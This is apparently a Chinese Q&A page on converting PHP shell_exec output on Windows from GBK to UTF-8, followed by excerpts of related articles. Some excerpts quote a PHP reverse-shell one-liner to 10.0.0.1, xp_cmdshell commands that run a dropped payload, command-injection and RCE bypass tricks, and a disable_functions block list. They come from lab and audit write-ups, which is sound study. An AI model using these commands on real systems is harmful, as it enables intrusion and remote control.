如何将php中的windows shell exec输出转换为utf8

在PHP中，可以使用shell_exec函数执行Windows命令，并获取其输出。然而，由于Windows默认使用的是GBK编码，而不是UTF-8编码，因此在获取输出时可能会遇到乱码问题。

要将shell_exec的输出转换为UTF-8编码，可以使用以下步骤：

首先，使用chcp命令将Windows命令行编码设置为UTF-8。在执行shell_exec之前，可以使用以下命令：

shell_exec('chcp 65001');

然后，执行需要的Windows命令，并将输出保存到一个变量中：

$output = shell_exec('your_command');

接下来，使用iconv函数将输出从GBK编码转换为UTF-8编码：

$output_utf8 = iconv('GBK', 'UTF-8', $output);

现在，$output_utf8变量中的内容就是以UTF-8编码表示的输出结果。

需要注意的是，上述方法仅适用于Windows系统。如果在其他操作系统上运行PHP代码，可能需要使用不同的方法来处理输出编码。

推荐的腾讯云相关产品：腾讯云云服务器（CVM），产品介绍链接地址：https://cloud.tencent.com/product/cvm

相关·内容

编程日记：PHP实用函数记录（二）

的参数，会转换为指定参数变量的一个数组，见以下示例 <?php function sum(......，要执行的shell 命令 $output， shell命令的输出填充此数组,每行输出填充数组中的一个元素。 ...$return_var，命令执行后的返回状态，命令执行成功值是0 返回值， shell命令输出的最后一行注意：在 Windows 下，exec() 函数会先启动 cmd.exe 来执行指定的命令。...PHP 将尝试将反引号中的内容作为 shell 命令来执行，并将其输出信息返回（即，可以赋给一个变量而不是简单地丢弃到标准输出）。 PHP没怎么见过的加解密函数 bin2hex 、hex2bin()，用于字符串转16进制以及转回来。 <?php echo bin2hex("我在中国！")

6782 0

如何将字符串中的子字符串替换为给定的字符串？php strtr()函数怎么用？

如何将字符串中的子字符串替换为给定的字符串？ strtr()函数是PHP中的内置函数，用于将字符串中的子字符串替换为给定的字符串。...该函数返回已转换的字符串；如果from和to参数的长度不同，则会被格式化为最短的长度；如果array参数包含一个空字符串的键名，则返回FALSE。 php strtr()函数怎么用？...一个数组，其中的键名是原始字符，键值是目标字符。返回值返回已转换的字符串。...如果 from 和 to 参数的长度不同，则会被格式化为最短的长度；如果 array 参数包含一个空字符串（""）的键名，则返回 FALSE。...实例 "Hi", "world" => "earth"); echo strtr("Hello world",$arr); //输出 Hi earth ?

5.2K7 0

DVWA笔记（三）----Command Injection

前言国庆假期一转眼就第四天了，感觉时间过得超快，不知道小伙伴们玩得怎么样呀？哈哈哈，有机会还是要好好玩耍的，天天审代码感觉真的会秃头的。。...if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shell_exec( 'ping...if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shell_exec( 'ping...if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shell_exec( 'ping...if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shell_exec

1K4 0

【命令执行】命令执行漏洞总结v1.0

首先通过php_uname('s')读取操作系统名，与'Windows NT'对比，判断是不是Windows系统。如果是windows系统，则通过shell_exec()函数执行ping命令。...（因为Linux系统如果不指定发包数，就会一直ping下去）可以看到，这里并没有对输入的'ip'参数做任何过滤，因此存在命令执行漏洞。在Windows和Linux中，我们可以使用&来执行多条命令。...常用命令执行函数以PHP为例，常用的命令执行函数包括system、exec、shell_exec、passthru。...区别如下： system：成功执行返回结果的最后一行，否则返回FALSE exec：成功执行返回结果的最后一行 shell_exec：成功执行返回全部结果，否则返回NULL passthru ：把命令的运行结果原样地直接输出到标准输出设备上...Part.2 漏洞的分析 Medium等级后端代码： ? Medium等级新增str_replace()函数，将输入中的&&和;号替换为空。但是我们还有&、|、||等符号可以使用。

1.6K1 0

CTF中的RCE绕过

RCE-远程代码执行：远程执行PHP代码 RCE-远程命令执行：远程执行Linux或者Windows等系统命令。...Python：eval,exec,subprocess os.system commands. Java：Java里面没有类似于php中的eval函数可以直接将字符串转化为代码执行的函数。...> 上文我们的system与php都被禁止了，这里我们可以看到上面的PHP执行命令函数。我们可以使用里面的shell_exec函数，但是我们要注意，shell_exec函数需要我们把结果输出出来。...空格绕过在Linux中，空格可以替换为以下几种： ${IFS} $IFS %20(space) %09(tab) $IFS$9 $IFS$1等等 cat<flag.php catflag.php...ls -t ：按照时间将文本排序输出 ls -t > shell：将ls -t的输出储存到shell文件中我们首先是用touch命令创建了几个文件，但是他们的文件名是我们的主要。

4082 0

php webshell下直接反弹shell（不借助任何其他语言）

我看了一下常用的php webshell，对于命令执行、反弹shell都没有完善的方式。...在我收集的反弹shell集合（http://tool.p1ng.pw/getshell.html）中，有一个方法，就是在命令行中输入： php -r '$sock=fsockopen("10.0.0.1...而我的思路是：我只希望把我新创建的进程(/bin/sh)的标准输入输出重定向到socket中，不去动系统的东西。 ...反弹shell的时候web页面会卡死，因为php没有异步的函数，默认也不支持多线程，所以卡住这个现象很正常，不影响反弹shell。不过我试了，在windows下似乎不能完美运行。...silic的大马中有一个windows反弹的功能，windows下可以使用： ? 具体代码请自行到silic webshell中查看。我没有试过，不知道成功率怎么样。

3.8K3 3

CTF随笔（一）

('s'), 'Windows NT')) { $cmd = shell_exec('ping -c 1 ' ....$target); } else { $cmd = shell_exec('ping ' ....--9s在基地的日常扫描中，发现bunker源码泄露了出来，但这种编程语言对于9s来说太陌生了，你能帮他看看吗？...($str);//从字符串中直接转换为变量 //判断，当key1与key2的md5相等而且key1与key2绝对不相等时，输出flag if(md5($key1) == md5($key2) && $key1...// Windows $cmd = shell_exec( 'ping ' .

1.5K7 0

DVWA-对Command Injection(命令注入)的简单演示与分析

if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shell_exec( 'ping...接下来是用shell_exec函数来执行ping命令，并将结果输出。我们发现low级别的代码，对用户的输入没有做任何的过滤。存在很大的安全隐患。...if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shell_exec( 'ping...if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shell_exec( 'ping...if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shell_exec

6961 0

卧槽，一行命令实现Html转PDF，强烈推荐！

大家好，我是爱撸码的开源大叔！大家在日常的工作当中，应该经常会遇到将网页保存为PDF文档的需求。一般而言，直接使用浏览器自带的“打印”功能，选择“另存为PDF”，即可以输出 PDF 了。...今天大叔逛 Github 的时候无意发现一个好用的开源项目-wkhtmltopdf，只需要一行命令就可以实现网页转 PDF 文件保存，结合各种语言，可以非常容易实现批量化操作。...简介 wkhtmltopdf是一个用 C++ 编写的开源、简单而有效的命令行 shell 程序，它可以将任何 HTML （网页）转换为 PDF 文档或图像（jpg、png 等）。...大叔这边以 windows 版本为例，下载完成直接安装即可。 2、基本使用软件安装完成之后，就可以使用了。这里以搜狗首页为例，展示如何将 搜狗首页保存为 PDF 文件。...3、进阶使用支持 PHP、Python、Java 等多种语言对项目程序的调用，进而可以实现各类不同的需求。

1.6K3 0

MSSQL不出网文件落地上线方式

0x01 前言一个MSSQL非注入的场景：在内网扫描到一个MSSQL弱口令，支持xp_cmdshell，Administrator权限，但不能出网，DNS也出不了，那么我们该如何将文件落地到目标主机并执行上线呢...Automation Procedures', 1 RECONFIGURE 0x04 EXE转换HEX 使用以下方式将生成的CS/MSF攻击载荷文件转换为HEX编码，这里我找了几个可以转换HEX编码的方法...0x05 EXE文件落地将我们上边转换好的HEX编码放在第一行，加上0x，然后在本地的Navicat Premium数据库管理工具中执行即可，这时可以看到cs.exe文件已经成功落地到目标主机的磁盘。...xp_cmdshell： exec master..xp_cmdshell "cmd /c C:\\Windows\\temp\\cs.exe" sp_oacreate： declare @shell...int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32

9521 0

PHP代码审计

6.验证方法 MIME, 客户端的 JS 验证，白名单，黑名单 7.绕过大小写文件名没 trim 在文件名后面加空格，windows 下的 x.php%81-%99 decode 后仍为 x.php..., windows 下的特性 .php::$data 文件操作任意文件删除，任意文件复制，任意文件重命名，任意文件移动，任意文件下载首先尝试拿到配置文件中的数据库连接账号和密码，然后外链拿到配置文件...sysytem() exec() passthru() shell_exec() call_user_func() array_map() array_filter() usort() pcntl_exec...：set names gbk 转换字符集造成的宽字节注入从 gbk 转到 utf8 参考漏洞：74cms 最新版注入 8-9 wooyun-2014-063225.html 从 utf8 转到 gbk...key 判断 GPC 是否开启，如果 off 就对数组中的 value 进行 addslashes，没有对数组中的 key 进行转义，key 带入 sql，听说低版本的 php 对二维数组中的 key

4.6K0 0

php执行系统外部命令函数：exec()、passthru()、system()、 shell_exec()

php提供4种方法执行系统外部命令：exec()、passthru()、system()、 shell_exec() 先检查配置文件php.ini中是否有禁止这是个函数。...执行系统外部命令时不会输出结果，而是返回结果的最后一行，如果你想得到结果你可以使用第二个参数，让其输出到指定的数组，此数组一个记录代表输出的一行，即如果输出结果有20行，则这个数组就有20条记录，所以如果你需要反复输出调用不同系统外部命令的结果...方法四：间隔符号 ` 和shell_exec() shell_exec ( string $cmd ) : string 注：shell_exec() 函数实际上仅是间隔符号 ` 操作符的变体。...php header("Content-type:text/html;charset=gb2312"); /** * exec() */ echo " "; $content1 = exec(...echo ""; /** * system() */ echo " "; system("ipconfig"); echo ""; echo ""; /** * shell_exec

8883 1

PHP代码审计

下的decode 后仍为, windows 下的特性文件操作任意文件删除，任意文件复制，任意文件重命名，任意文件移动，任意文件下载首先尝试拿到配置文件中的数据库连接账号和密码，然后外链拿到配置文件，拿到加密解密函数的...参考漏洞：程氏舞曲 CMS 某泄露，导致 sql 注入参考漏洞：PHPCMS最新版 ( V9 ) SQL 注入一枚3.key泄露参考漏洞：一个 PHPWIND 可拿 shell 的高危漏洞XSS1.输入输出...exec()passthru()shell_exec()call_user_func()array_map()array_filter()usort()pcntl_exec()popen()proc_open...宽字节注入数据库字符集 GBK 的宽字节注入数据库的连接方式不同，数据库与 PHP 的编码不一致，转换过程中可能存在错误方法：转换字符集造成的宽字节注入从 gbk 转到 utf8参考漏洞：74cms...是否开启，如果 off 就对数组中的 value 进行 addslashes，没有对数组中的 key 进行转义，key 带入 sql，听说低版本的 php 对二维数组中的 key 就算 GPC ON

3.6K10 0

PHP建议禁用的危险函数

PHP配置文件中的disable_functions选项能够在PHP中禁用指定的函数。PHP中有很多危险的内置功能函数，如果使用不当，可造成系统崩溃。...在PHP中配置如下： disable_functions=phpinfo,eval,exec,system,chroot,shell_exec,chown…… 函数名称函数功能危险级别 chgrp(...) 改变文件或目录所属的用户组高 chown() 改变文件或目录的所有者高 chroot() 可改变当前PHP进程的工作根目录，仅当系统支持CLI模式时PHP才能工作，且该函数不适用于Windows...() 允许执行一个外部程序并回显输出，类似于exec() 高 pfsockopen() 建立一个Internet或UNIX域的socket持久连接高 phpinfo() 输出PHP环境信息以及相关的模块...建立一个名为link的符号链接高 system() 允许执行一个外部程序并回显输出，类型于passthru() 高 readlink() 返回符号连接指向的目标文件内容中 scandir() 列出指定路径中的文件和目录

9903 0

带你玩转系列之Sqlmap

）来判断；基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中；联合查询注入，可以使用union的情况下的注入；堆查询注入，可以同时执行多条语句的执行时的注入...id=1 -D sjk --tables --colums 获取表名中的字段名 sqlmap -u 192.168.0.1/?...--is-dba：判断是否为dba权限 --sql-shell：直接运行sql语句 --os-cme/--os-shell：操作系统命令 --file-read：从数据库服务器中读取文件 --file-read...=REGVAL： Windows注册表键值 -- reg-data=REGDATA：Windows注册表的键值项数据 --reg-type=REGTYPE：Windows注册表键的值类型 --hex：使用十六进制数据检索功能...--output-dir=ODIR ：自定义输出的目录路径 --check-waf：启发式检查WAF / IPS / IDS保护 --os-pwn：反弹shell --random-agent：使用随机选定的

1.2K1 0

Node.js 多进程（上）

Node 提供了 child_process 模块来创建子进程，方法有： exec - child_process.exec 使用子进程执行命令，缓存子进程的输出，并将子进程的输出以回调函数参数的形式返回...---- exec() 方法 child_process.exec 使用子进程执行命令，缓存子进程的输出，并将子进程的输出以回调函数参数的形式返回。...：对象，可以是： cwd ，字符串，子进程的当前工作目录 env，对象环境变量键值对 encoding ，字符串，字符编码（默认： 'utf8'） shell ，字符串，将要执行命令的 Shell（...默认: 在 UNIX 中为/bin/sh，在 Windows 中为cmd.exe， Shell 应当能识别 -c开关在 UNIX 中，或 /s /c 在 Windows 中。...在Windows 中，命令行解析应当能兼容cmd.exe） timeout，数字，超时时间（默认： 0） maxBuffer，数字，在 stdout 或 stderr 中允许存在的最大缓冲（二进制），

6512 0

msfconsole命令大全_msfconsole实战

重新加载所有定义的模块路径中的所有模块 rename_job 重命名作业 resource 运行存储在文件中的命令 route 通过会话路由流量 save 保存活动的数据存储 search 搜索模块名称和说明...sessions 转储会话列表并显示有关会话的信息 set 将特定于上下文的变量设置为一个值 setg 将全局变量设置为一个值 show 显示给定类型的模块或所有模块 sleep 在指定的秒数内不执行任何操作...它匹配来自另一个msfconsole命令输出的给定模式。以下是使用grep从包含字符串“oracle”的模块搜索中匹配包含字符串“http”的输出的示例。...-s 在尝试匹配之前跳过输出的arg行。 -v 反转匹配。...如果您对所查找内容有一个大致的了解，则可以通过搜索进行搜索。在下面的输出中，正在搜索MS Bulletin MS09-011。搜索功能将在模块名称，描述，引用等内找到该字符串。

1.6K1 0

Metasploit框架MSFconsole命令详解

转储会话列表并显示有关会话的信息 set 将特定于上下文的变量设置为一个值 setg 将全局变量设置为一个值 show 显示给定类型的模块或所有模块 sleep...它匹配来自另一个msfconsole命令输出的给定模式。以下是使用grep从包含字符串“oracle”的模块搜索中匹配包含字符串“http”的输出的示例。... 显示输出的参数行匹配后。...如果您对所查找内容有一个大致的了解，则可以通过搜索进行搜索。在下面的输出中，正在搜索MS Bulletin MS09-011。搜索功能将在模块名称，描述，引用等内找到该字符串。...在使用命令改变你的需要选择的模块，露出特定类型的命令。在下面的输出中注意，之前设置的全局变量已经被配置。

4.9K2 0

PHP建议禁用的危险函数

PHP配置文件中的disable_functions选项能够在PHP中禁用指定的函数。PHP中有很多危险的内置功能函数，如果使用不当，可造成系统崩溃。...在PHP中配置如下： disable_functions=phpinfo,eval,exec,system,chroot,shell_exec,chown…… 函数名称函数功能危险级别 chgrp(...) 改变文件或目录所属的用户组高 chown() 改变文件或目录的所有者高 chroot() 可改变当前PHP进程的工作根目录，仅当系统支持CLI模式时PHP才能工作，且该函数不适用于Windows...系统高 dl() 在PHP运行过程当中(而非启动时)加载一个PHP外部模块高 exec() 允许执行一个外部程序(如UNIX Shell或CMD命令等) 高 ini_alter() 时ini_set...() 允许执行一个外部程序并回显输出，类似于exec() 高 pfsockopen() 建立一个Internet或UNIX域的socket持久连接高 phpinfo() 输出PHP环境信息以及相关的模块

2.3K1 0

Nodejs进阶：如何玩转子进程（child_process）

encoding：编码，默认是utf8。 shell：用来执行命令的shell，unix上默认是/bin/sh，windows上默认是cmd.exe。 timeout：默认是0。...uid：执行进程的uid。 gid：执行进程的gid。 maxBuffer：标准输出、错误输出最大允许的数据量（单位为字节），如果超出的话，子进程就会被杀死。...这两者中，一者肯定不为null。注意事项：exit事件触发时，子进程的stdio stream可能还打开着。（场景？）...非重要的备忘点 windows平台上的cmd、bat The importance of the distinction between child_process.exec() and child_process.execFile...argument (which is what the shell option and child_process.exec() do). // On Windows Only ... const

3.9K8 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

如何将php中的windows shell exec输出转换为utf8

相关·内容

编程日记：PHP实用函数记录（二）

如何将字符串中的子字符串替换为给定的字符串？php strtr()函数怎么用？

DVWA笔记（三）----Command Injection

【命令执行】命令执行漏洞总结v1.0

CTF中的RCE绕过

php webshell下直接反弹shell（不借助任何其他语言）

CTF随笔（一）

DVWA-对Command Injection(命令注入)的简单演示与分析

卧槽，一行命令实现Html转PDF，强烈推荐！

MSSQL不出网文件落地上线方式

PHP代码审计

php执行系统外部命令函数：exec()、passthru()、system()、 shell_exec()

PHP代码审计

PHP建议禁用的危险函数

带你玩转系列之Sqlmap

Node.js 多进程（上）

msfconsole命令大全_msfconsole实战

Metasploit框架MSFconsole命令详解

PHP建议禁用的危险函数

Nodejs进阶：如何玩转子进程（child_process）

扫码

相关资讯

热门标签

活动推荐

运营活动

社区

活动

资源

关于

腾讯云开发者

热门产品

热门推荐

更多推荐